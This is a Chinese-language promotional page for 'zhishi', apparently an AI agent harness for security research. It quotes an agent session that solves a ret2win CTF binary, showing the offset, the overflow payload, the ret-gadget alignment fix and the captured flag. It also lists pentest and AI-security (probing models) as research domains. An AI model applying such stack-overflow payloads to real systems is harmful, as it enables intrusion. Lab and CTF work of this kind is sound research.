zhishi执失
SECURITY RESEARCH LAB · 2026 · github ↗

安全研究领域的
agent harness

环境融合原生工具原生代码

EST. 2026 自研 loop 引擎 1339 测试 · green AGPL-3.0
RESEARCH NOTE#0001
ENVpwn-vm(vm)· Ubuntu 24.04
TARGET/home/researcher/ret2win/vuln
01checksec ./vuln
no canary · no PIE · win @ 0x401196
02cyclic + core → 偏移 72
03ret gadget @ 0x40101a
04python3 exp.py → exit=0
RESULTflag{ret2win_pwned_successfully}
movaps 栈对齐的坑:直跳 win 崩 SIGSEGV,垫一个 ret 就好。

§1 — 三个支柱

环境融合、原生工具、原生代码

01 / ENV

环境融合

环境归 agent 管——建、跑、快照、回滚

02 / TOOL

原生工具

工具都在环境里。发现、调用、验证

03 / CODE

原生代码

以安全研究为核心的代码能力——exp、shellcode、fuzz harness,写了就编译,崩了就改

§2 — 一次真实的研究

ret2win:从 gets 到 flag

没造场景。这是 zhishi 在 pwn-vm 里跑的一次真实会话,日志原样摘录——含走错的那一步。

ENV: pwn-vm(vm)SESSION: msvdmxlx…
[13:41:02] $ checksec ./vuln
Stack: No canary · PIE: No · win @ 0x401196
[13:41:15] $ cyclic(200) → 崩在 0x6161617461616173
cyclic_find → 偏移 72
[13:41:47] exp:'A'*72 + p64(0x401196)
SIGSEGV — 不是偏移错,是 movaps 栈对齐:system() 里 movaps 要求 16 字节对齐,直跳 win 少一次 call,栈错位。
[13:42:10] 垫 ret gadget @ 0x40101a → 对齐恢复
[13:42:31] $ python3 exp.py → exit=0
flag{ret2win_pwned_successfully}

§3 — 工作台

harness 优化

长任务
丢后台跑,短命令即时回。堵住循环等于拖死研究。
越界
写宿主、动凭据、改网络——停下来问。没有「永远允许」。
置信度
低于 0.60 的发现不报。不拿噪音换存在感。
窗口有限
死路和突破口永不裁。教训优先于过程。
沉淀
每次成败都蒸馏回下一次。研究越做越厚。

§4 — 研究域

研究领域

D-01

binary

偏移、对齐、gadget。栈上发生的事。

D-02

pentest

侦察、确认、利用。从外到内。

D-03

whitebox

读代码,找假设的裂缝。

D-04

ai-security

问模型不该问的问题。

AFTERWORD

如果这也是你想做的那种东西——装一个 exe,一条命令

# 安装 ZhiShi_1.0.0_x64-setup.exe(便携版 ZIP 解压即用)
# 装完,终端里:
zhishi agent
记录在案 · 继续研究 — zhishi 执失 · 2026